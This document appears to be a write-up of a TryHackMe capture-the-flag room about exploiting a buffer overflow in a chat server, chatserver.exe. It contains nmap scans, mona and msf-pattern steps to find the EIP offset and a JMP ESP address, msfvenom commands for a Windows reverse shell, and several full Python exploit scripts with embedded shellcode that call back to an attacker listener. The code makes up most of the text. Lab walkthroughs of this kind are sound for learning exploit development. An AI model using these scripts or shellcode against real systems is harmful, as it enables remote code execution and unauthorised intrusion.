Penetration Testing Challenge
https://tryhackme.com/room/internal
Task 1 - Deploy Machine and Scan Network
Blocking our ping probes…
sudo nmap -Pn -sS -T4 -p- 10.10.149.246 -vvvnmap -sC -sV -T4 10.10.103.228 -p3389,21,9999 -Pn -vvv- Port 21 FTP
- Port 3389 Windows RDP
- Port 9999 Brainstorm Char
Answer the questions below
How many ports are open?
Task 2 Accessing Files
Let’s continue with the enumeration!
- Looking inside port 21 we find chatserver.exe
Answer the questions below
What is the name of the exe file you found?
- chatserver.exe
Task 3 - Access
After enumeration, you now must have noticed that the service interacting on the strange port is some how related to the files you found! Is there anyway you can exploit that strange service to gain access to the system?
- Setup Immunity Debugger and Mona in Kali VM and lets try to buffer overflow following our steps from Buffer Overflow Prep, Tib3rius Cheatsheet
- On our windows 7 32 bit vm download chatserver.exe and set it to bridged in vmware in order to avoid filtered port states.
It is worth using a Python script to try out different payloads to gain access! You can even use the files to locally try the exploit.
Maybe tib3reus can help me..
I know no python. I need to learn python.
Answer the questions below
Read the description.
After testing for overflow, by entering a large number of characters, determine the EIP offset.
- Set working folder in Immunity.
!mona config -set workingfolder c:\mona\%p - Create a.py with
print ("A" *5000)and thenpython3 a.pyand paste into netcatnc -nv 192.168.0.24 9999 - The EIP Register should be overwritten by A’s (\x41) this is great we also have EBP overwritten. If we can control and overwrite the EIP we can control and point to something malicious.
msf-pattern_create -l 5000and send in netcat- note this code overwrites the EAX the ESP and the EIP. note the EIP 31704330
msf-pattern_offset -l 5000 -q 31704330- exact match at offset 2012 as long as this finds a exact match we are good to go.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import socket
import sys
username = b"oskar"
message = b"A" * 2012 + b"B" * 4
try:
print("Sending Payload...")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.0.24',9999))
s.recv(1024)
s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + b'\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect to the server")
sys.exit()
- we control the EIP when its overwritten with the 4 B’s 42424242
- find badchars
- https://github.com/cytopia/badchars
- update our code with the badchars variable
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
import socket
import sys
username = b"oskar"
message = b"A" * 2012 + b"B" * 4
badchars = (
b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
try:
print("Sending Payload...")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.0.24',9999))
s.recv(1024)
s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + badchars + b'\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect to the server")
sys.exit()
- run and program should crash
- right click on ESP and follow in dump
Now you know that you can overflow a buffer and potentially control execution, you need to find a function where ASLR/DEP is not enabled. Why not check the DLL file.
- !mona modules - will find protection modules. We are looking for falses straight accross
- We can see that chatserver.exe and essfunc.dll give us falses straight accross.
- !mona find -s “\xff\xe4” -m essfunc.dll
- this finds us our jump point
- 625014DF
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import socket
import sys
username = b"oskar"
message = b"A" * 2012 + b"\xdf\x14\x50\x62"
payload = b""
try:
print("Sending Payload...")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.0.24',9999))
s.recv(1024)
s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + badchars + b'\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect to the server")
sys.exit()
- breakpoint at essfunc.625014DF
- now we can generate shellcode
Since this would work, you can try generate some shellcode - use msfvenom to generate shellcode for windows.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.23 LPORT=7777 -b "\x00" -f c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import socket
import sys
username = b"oskar"
message = b"A" * 2012 + b"\xdf\x14\x50\x62" + b"\x90" * 32
payload = (b"\xbd\x5c\x4a\x35\x2e\xd9\xcd\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
b"\x52\x31\x6e\x12\x03\x6e\x12\x83\xb2\xb6\xd7\xdb\xb6\xaf\x9a"
b"\x24\x46\x30\xfb\xad\xa3\x01\x3b\xc9\xa0\x32\x8b\x99\xe4\xbe"
b"\x60\xcf\x1c\x34\x04\xd8\x13\xfd\xa3\x3e\x1a\xfe\x98\x03\x3d"
b"\x7c\xe3\x57\x9d\xbd\x2c\xaa\xdc\xfa\x51\x47\x8c\x53\x1d\xfa"
b"\x20\xd7\x6b\xc7\xcb\xab\x7a\x4f\x28\x7b\x7c\x7e\xff\xf7\x27"
b"\xa0\xfe\xd4\x53\xe9\x18\x38\x59\xa3\x93\x8a\x15\x32\x75\xc3"
b"\xd6\x99\xb8\xeb\x24\xe3\xfd\xcc\xd6\x96\xf7\x2e\x6a\xa1\xcc"
b"\x4d\xb0\x24\xd6\xf6\x33\x9e\x32\x06\x97\x79\xb1\x04\x5c\x0d"
b"\x9d\x08\x63\xc2\x96\x35\xe8\xe5\x78\xbc\xaa\xc1\x5c\xe4\x69"
b"\x6b\xc5\x40\xdf\x94\x15\x2b\x80\x30\x5e\xc6\xd5\x48\x3d\x8f"
b"\x1a\x61\xbd\x4f\x35\xf2\xce\x7d\x9a\xa8\x58\xce\x53\x77\x9f"
b"\x31\x4e\xcf\x0f\xcc\x71\x30\x06\x0b\x25\x60\x30\xba\x46\xeb"
b"\xc0\x43\x93\xbc\x90\xeb\x4c\x7d\x40\x4c\x3d\x15\x8a\x43\x62"
b"\x05\xb5\x89\x0b\xac\x4c\x5a\xf4\x99\x4e\x8d\x9c\xdb\x4e\xaf"
b"\x3d\x55\xa8\xa5\xad\x33\x63\x52\x57\x1e\xff\xc3\x98\xb4\x7a"
b"\xc3\x13\x3b\x7b\x8a\xd3\x36\x6f\x7b\x14\x0d\xcd\x2a\x2b\xbb"
b"\x79\xb0\xbe\x20\x79\xbf\xa2\xfe\x2e\xe8\x15\xf7\xba\x04\x0f"
b"\xa1\xd8\xd4\xc9\x8a\x58\x03\x2a\x14\x61\xc6\x16\x32\x71\x1e"
b"\x96\x7e\x25\xce\xc1\x28\x93\xa8\xbb\x9a\x4d\x63\x17\x75\x19"
b"\xf2\x5b\x46\x5f\xfb\xb1\x30\xbf\x4a\x6c\x05\xc0\x63\xf8\x81"
b"\xb9\x99\x98\x6e\x10\x1a\xa8\x24\x38\x0b\x21\xe1\xa9\x09\x2c"
b"\x12\x04\x4d\x49\x91\xac\x2e\xae\x89\xc5\x2b\xea\x0d\x36\x46"
b"\x63\xf8\x38\xf5\x84\x29")
try:
print("Sending Payload...")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.0.24',9999))
s.recv(1024)
s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + payload + b'\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect to the server")
sys.exit()
This gives us shell now we can change these to work on the target.
After gaining access, what is the content of the root.txt file?
msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=7777 -b "\x00" -f cadjust our payload to suit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import socket
import sys
username = b"oskar"
message = b"A" * 2012 + b"\xdf\x14\x50\x62" + b"\x90" * 32
payload = (b"\xdd\xc4\xd9\x74\x24\xf4\x5e\xba\x5a\x94\x76\xdd\x2b\xc9\xb1"
b"\x52\x31\x56\x17\x83\xee\xfc\x03\x0c\x87\x94\x28\x4c\x4f\xda"
b"\xd3\xac\x90\xbb\x5a\x49\xa1\xfb\x39\x1a\x92\xcb\x4a\x4e\x1f"
b"\xa7\x1f\x7a\x94\xc5\xb7\x8d\x1d\x63\xee\xa0\x9e\xd8\xd2\xa3"
b"\x1c\x23\x07\x03\x1c\xec\x5a\x42\x59\x11\x96\x16\x32\x5d\x05"
b"\x86\x37\x2b\x96\x2d\x0b\xbd\x9e\xd2\xdc\xbc\x8f\x45\x56\xe7"
b"\x0f\x64\xbb\x93\x19\x7e\xd8\x9e\xd0\xf5\x2a\x54\xe3\xdf\x62"
b"\x95\x48\x1e\x4b\x64\x90\x67\x6c\x97\xe7\x91\x8e\x2a\xf0\x66"
b"\xec\xf0\x75\x7c\x56\x72\x2d\x58\x66\x57\xa8\x2b\x64\x1c\xbe"
b"\x73\x69\xa3\x13\x08\x95\x28\x92\xde\x1f\x6a\xb1\xfa\x44\x28"
b"\xd8\x5b\x21\x9f\xe5\xbb\x8a\x40\x40\xb0\x27\x94\xf9\x9b\x2f"
b"\x59\x30\x23\xb0\xf5\x43\x50\x82\x5a\xf8\xfe\xae\x13\x26\xf9"
b"\xd1\x09\x9e\x95\x2f\xb2\xdf\xbc\xeb\xe6\x8f\xd6\xda\x86\x5b"
b"\x26\xe2\x52\xcb\x76\x4c\x0d\xac\x26\x2c\xfd\x44\x2c\xa3\x22"
b"\x74\x4f\x69\x4b\x1f\xaa\xfa\x7e\xe2\xcb\x1b\x16\xe0\x33\xc2"
b"\x86\x6d\xd5\x90\x58\x38\x4e\x0d\xc0\x61\x04\xac\x0d\xbc\x61"
b"\xee\x86\x33\x96\xa1\x6e\x39\x84\x56\x9f\x74\xf6\xf1\xa0\xa2"
b"\x9e\x9e\x33\x29\x5e\xe8\x2f\xe6\x09\xbd\x9e\xff\xdf\x53\xb8"
b"\xa9\xfd\xa9\x5c\x91\x45\x76\x9d\x1c\x44\xfb\x99\x3a\x56\xc5"
b"\x22\x07\x02\x99\x74\xd1\xfc\x5f\x2f\x93\x56\x36\x9c\x7d\x3e"
b"\xcf\xee\xbd\x38\xd0\x3a\x48\xa4\x61\x93\x0d\xdb\x4e\x73\x9a"
b"\xa4\xb2\xe3\x65\x7f\x77\x13\x2c\xdd\xde\xbc\xe9\xb4\x62\xa1"
b"\x09\x63\xa0\xdc\x89\x81\x59\x1b\x91\xe0\x5c\x67\x15\x19\x2d"
b"\xf8\xf0\x1d\x82\xf9\xd0")
try:
print("Sending Payload...")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.203.108',9999))
s.recv(1024)
s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + payload + b'\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect to the server")
sys.exit()
send through payload with netcat listener setup to gain shell
our root.txt is on desktop of drake